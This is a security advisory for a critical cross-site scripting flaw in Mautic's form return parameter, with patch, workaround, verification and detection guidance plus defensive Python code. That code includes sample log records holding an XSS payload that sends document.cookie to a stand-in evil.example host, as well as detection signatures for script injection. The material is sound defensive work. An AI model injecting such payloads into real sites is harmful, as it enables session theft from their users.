CVE-2020-35125

9.6 CRITICAL

📋 TL;DR

Cross-site scripting (XSS) in Mautic's forms component: the value of the mautic[return] request parameter is echoed into the response without adequate encoding, so an attacker who gets a victim to submit a crafted request can run arbitrary JavaScript in the victim's browser in the context of the Mautic site. All releases before 3.2.4 on the 3.x branch and before 2.16.5 on the 2.x branch are affected. Typical use is stealing session cookies, redirecting users, or performing actions as an authenticated user.

💻 Affected Systems

Products:
  • Mautic
Versions: All releases before 3.2.4 (3.x branch) and before 2.16.5 (2.x branch)
Operating Systems: All
Default Config Vulnerable: ⚠️ Yes
Notes: The flaw is in the forms component, a core feature of Mautic; forms are embedded on public pages, so the affected endpoint is normally reachable without authentication.

📦 What is this software?

Mautic is an open-source marketing automation platform written in PHP on the Symfony framework. It provides contact management, email campaigns, landing pages and embeddable web forms; the forms component collects visitor data and, after submission, can send the visitor on to a configured return address, which is what the mautic[return] parameter carries.

⚠️ Risk & Real-World Impact

🔴

Worst Case

An attacker chains the XSS with other weaknesses to reach remote code execution (as described in Horizon3's disclosure, which this page cites but does not link), ending in full compromise of the host.

🟠

Likely Case

Session hijacking, credential theft, or unauthorized actions performed in the context of authenticated users.

🟢

If Mitigated

Workarounds (strict validation of the return parameter, a WAF rule, CSP) reduce what an attacker can do with the flaw, but the unencoded output remains in the code until the patched release is installed.

🌐 Internet-Facing: HIGH
🏢 Internal Only: MEDIUM

🎯 Exploit Status

Public PoC: ⚠️ Yes
Weaponized: CONFIRMED
Unauthenticated Exploit: ⚠️ Yes
Complexity: LOW

Horizon3 has published detailed exploitation notes showing how this XSS can be chained to reach RCE; treat exposed, unpatched instances as actively targetable.

🛠️ Fix & Mitigation

✅ Official Fix

Patch Version: 3.2.4 (or 2.16.5 for older branches)

Vendor Advisory: https://github.com/mautic/mautic/security/advisories/GHSA-42q7-95j7-w62m

Restart Required: No

Instructions:

1. Back up the Mautic installation directory and the database.
2. Update to 3.2.4 (3.x) or 2.16.5 (2.x) via the built-in updater or a manual download of the release package.
3. Clear the cache after the update (`php bin/console cache:clear` on 3.x, `php app/console cache:clear` on 2.x) so stale compiled templates are not served.

🔧 Temporary Workarounds

Input Validation Filter (applies to: all platforms)

Validate the mautic[return] parameter server-side before it is used: accept only a site-relative path or an http(s) URL on the instance's own host and reject everything else (javascript:, data: and protocol-relative targets included). Allow-listing is the point; stripping "bad" substrings is easy to bypass with encoding.

WAF Rule (applies to: all platforms)

Deploy a web application firewall rule that inspects requests to the form submission endpoint and blocks a mautic[return] value containing script tags, event-handler attributes or a javascript: URL. The rule must match on the URL-decoded value (including double-encoded variants); a rule that pattern-matches the raw request lets a percent-encoded payload straight through.
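The two workarounds above, worked as an added example (this is not code from the page or from Mautic itself): a substring denylist of the kind a hurried WAF rule implements, beside the allow-list validation that actually holds up. Python is used for the demonstration; the hostname `crm.example.org`, the function names, and the assumption that the validated value is later echoed into an HTML attribute are all mine.

```python
import html
from urllib.parse import unquote_plus, urlsplit

# Assumption: the Mautic instance is only ever reached under these hostnames.
ALLOWED_HOSTS = {"crm.example.org"}


def naive_denylist_check(raw_value):
    """The weak approach: look for '<script' in the parameter as it appears on the
    wire (still percent-encoded). Encoded payloads sail past it."""
    return "<script" not in raw_value.lower()


def safe_return_target(raw_value, allowed_hosts=ALLOWED_HOSTS):
    """Allow-list validation of a post-submit redirect target.

    Decodes the wire value once, then returns it only if it is a site-relative
    path or an http(s) URL on an allowed host. Anything else returns None.
    """
    value = unquote_plus(raw_value).strip()
    if not value or len(value) > 2048:
        return None
    # Control characters and the characters that close an HTML attribute or tag
    # are never legitimate in a redirect target; rejecting them means the value
    # cannot break out of whatever markup context it is later echoed into.
    if any(ord(c) < 0x20 or c in '<>"\'' for c in value):
        return None
    parts = urlsplit(value)
    if not parts.scheme and not parts.netloc:
        # Relative target: a single leading slash only ("//host" is protocol-relative).
        return value if value.startswith("/") and not value.startswith("//") else None
    if parts.scheme.lower() in ("http", "https") and parts.hostname in allowed_hosts:
        return value
    # javascript:, data:, vbscript:, off-site hosts, user@host tricks and the like.
    return None


def reflect_into_attribute(target):
    """Output encoding for the point where the validated target is echoed into
    markup (assumed here to be an HTML attribute). Validation and encoding are
    separate defences; the patch in 3.2.4 / 2.16.5 is what fixes the latter."""
    return html.escape(target, quote=True)


if __name__ == "__main__":
    for probe in ("/thank-you",
                  "https%3A%2F%2Fcrm.example.org%2Fthanks%3Fid%3D7",
                  "javascript:alert(1)",
                  "%3Cscript%3Ealert(1)%3C%2Fscript%3E",
                  "//evil.example/"):
        print(f"{probe!r:50} naive={naive_denylist_check(probe)!s:5} "
              f"allowlist={safe_return_target(probe)!r}")
```

The naive check reports the percent-encoded `<script>` probe as clean; the allow-list rejects it, the `javascript:` URL and the protocol-relative host alike, while letting the two legitimate targets through.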

🧯 If You Can't Patch

  • Restrict the Mautic administration interface (/s/...) to trusted IP addresses. This does not stop the XSS itself, since forms are served to the public, but it limits what a stolen administrator session is worth to an attacker coming from elsewhere.
  • Add a Content-Security-Policy header to reduce the impact of injected script. Mautic's own pages rely on inline scripts, so roll it out as Content-Security-Policy-Report-Only first and tighten it once the reports show what the application legitimately needs.

🔍 How to Verify

Check if Vulnerable:

An instance is vulnerable if it runs any 3.x release below 3.2.4 or any 2.x release below 2.16.5; the version is shown in the admin dashboard.

Check Version:

Check the admin dashboard, or read the app/version.txt file under the install root (older releases also define the MAUTIC_VERSION constant in app/AppKernel.php).

Verify Fix Applied:

After updating, confirm the version reads 3.2.4 or higher (2.16.5 or higher on the 2.x branch), then submit a form with a harmless probe in mautic[return] (a string containing < and ") and confirm the response encodes or rejects it rather than echoing it raw.
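A fleet-audit helper, added here as an example (not from the page or from Mautic): it parses a Mautic version string, decides per branch whether it predates the fix, and reads app/version.txt from an install root. The file path is the one named above and is assumed; pre-release suffixes such as "-beta" are tolerated but ignored for the comparison.

```python
import re
from pathlib import Path

# First fixed release on each branch, as stated in the advisory.
FIRST_FIXED = {2: (2, 16, 5), 3: (3, 2, 4)}

VERSION_RE = re.compile(r"\s*v?(\d+)\.(\d+)\.(\d+)(?:-[0-9A-Za-z.]+)?")


def parse_version(text):
    """Turn '3.2.4', ' 3.2.4\\n' or '3.2.4-beta' into (3, 2, 4); raise on junk."""
    m = VERSION_RE.match(text)
    if not m:
        raise ValueError(f"unrecognised Mautic version string: {text!r}")
    return tuple(int(x) for x in m.groups())


def is_vulnerable(version_text):
    """True if the release predates the fix on its branch."""
    v = parse_version(version_text)
    major = v[0]
    if major in FIRST_FIXED:
        return v < FIRST_FIXED[major]
    # 1.x predates the fix entirely; 4.x and later were cut after it.
    return major < 2


def audit_install(root):
    """Read app/version.txt below a Mautic install root (assumed layout) and report."""
    text = (Path(root) / "app" / "version.txt").read_text(encoding="utf-8")
    return {
        "version": ".".join(str(n) for n in parse_version(text)),
        "vulnerable": is_vulnerable(text),
    }


if __name__ == "__main__":
    for sample in ("2.16.4", "2.16.5", "3.2.3", "3.2.4", "4.0.0"):
        print(f"{sample:8} vulnerable={is_vulnerable(sample)}")
```

Run `audit_install("/var/www/mautic")` (or whatever the install root is) on each host; a 2.x instance is judged against 2.16.5 and a 3.x instance against 3.2.4, so a 2.16.5 install is not wrongly flagged just because 2 is less than 3.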

📡 Detection & Monitoring

Log Indicators:

  • Form submissions whose parameters contain script tags, event-handler attributes or javascript: URLs (look at the URL-decoded values)
  • Administrator sessions reused from a new client address shortly after suspicious form activity, consistent with a hijacked session
  • Multiple failed login attempts following suspicious form activity

Network Indicators:

  • HTTP requests to the form submission endpoint carrying a mautic[return] parameter with script tags or JavaScript code, in the query string or the POST body

SIEM Query:

http.url:*mautic* AND http.param:*mautic[return]* AND (http.param:*script* OR http.param:*javascript*)

Field names vary by platform, and the query only works where the log source records URL-decoded request parameters (a proxy or WAF log, not a plain access log, which does not keep POST bodies). The square brackets in the parameter name usually need escaping in the query language.
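The SIEM logic above run over sample records, as an added example (not part of the page or of Mautic): the records are constructed here in the shape of a proxy/WAF log that keeps both query string and POST body, the signature list is mine, and the key matcher also accepts the `mauticform[...]` prefix that Mautic's rendered forms use (my assumption; the page names `mautic[return]`). Values are percent-decoded repeatedly so double-encoded payloads are caught.

```python
import re
from urllib.parse import parse_qs, unquote_plus, urlsplit

# Constructed sample records in the shape of a reverse-proxy / WAF log that
# records the query string and the POST body. Addresses are documentation ranges.
SAMPLE_REQUESTS = [
    {"src": "203.0.113.10", "method": "GET",
     "url": "/form/submit?formId=3&mautic[return]=https%3A%2F%2Fcrm.example.org%2Fthanks",
     "body": ""},
    {"src": "198.51.100.7", "method": "POST", "url": "/form/submit?formId=3",
     "body": "mauticform[formId]=3&mauticform[return]=%3Cscript%3Edocument.location%3D"
             "%27https%3A%2F%2Fevil.example%2F%3F%27%2Bdocument.cookie%3C%2Fscript%3E"},
    {"src": "198.51.100.7", "method": "POST", "url": "/form/submit?formId=3",
     "body": "mauticform[formId]=3&mauticform[return]=%253Cscript%253Ealert(1)%253C%252Fscript%253E"},
    {"src": "192.0.2.44", "method": "GET",
     "url": "/form/submit?formId=3&mautic[return]=javascript:alert(document.cookie)",
     "body": ""},
    {"src": "192.0.2.44", "method": "POST", "url": "/s/login",
     "body": "_username=admin&_password=x"},
]

RETURN_KEY = re.compile(r"^mautic(?:form)?\[return\]$")

# Detection signatures (heuristic; enforcement should allow-list instead).
SIGNATURES = [
    ("script tag", re.compile(r"<\s*script", re.I)),
    ("javascript: URL", re.compile(r"^\s*javascript\s*:", re.I)),
    ("data: URL", re.compile(r"^\s*data\s*:", re.I)),
    ("inline event handler", re.compile(r"\bon[a-z]+\s*=", re.I)),
]


def fully_decode(value, max_rounds=3):
    """Percent-decode until the value stops changing (bounded), so %253C -> %3C -> <."""
    for _ in range(max_rounds):
        decoded = unquote_plus(value)
        if decoded == value:
            break
        value = decoded
    return value


def classify(value):
    """Return the first matching signature name, or None for a benign-looking value."""
    decoded = fully_decode(value)
    for reason, pattern in SIGNATURES:
        if pattern.search(decoded):
            return reason
    return None


def return_params(record):
    """All (name, value) pairs for return parameters in the query string and POST body."""
    params = parse_qs(urlsplit(record["url"]).query, keep_blank_values=True)
    if record["method"] == "POST" and record["body"]:
        for key, values in parse_qs(record["body"], keep_blank_values=True).items():
            params.setdefault(key, []).extend(values)
    return [(k, v) for k, vals in params.items() if RETURN_KEY.match(k) for v in vals]


def scan(records):
    """Flag records whose return parameter matches a signature; one hit per offending value."""
    hits = []
    for rec in records:
        for key, value in return_params(rec):
            reason = classify(value)
            if reason:
                hits.append({"src": rec["src"], "param": key,
                             "reason": reason, "value": fully_decode(value)})
    return hits


if __name__ == "__main__":
    for hit in scan(SAMPLE_REQUESTS):
        print(f"{hit['src']:14} {hit['param']:20} {hit['reason']:22} {hit['value'][:60]}")
```

Three of the five constructed records are flagged: the two POST bodies (one single-, one double-encoded `<script>`) and the `javascript:` return URL in a GET; the legitimate same-site return target and the unrelated login request are not. Signatures are the right tool for detection, where a miss costs an alert rather than a compromise; blocking at the application should use an allow-list.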

🔗 References

  • Vendor advisory: https://github.com/mautic/mautic/security/advisories/GHSA-42q7-95j7-w62m
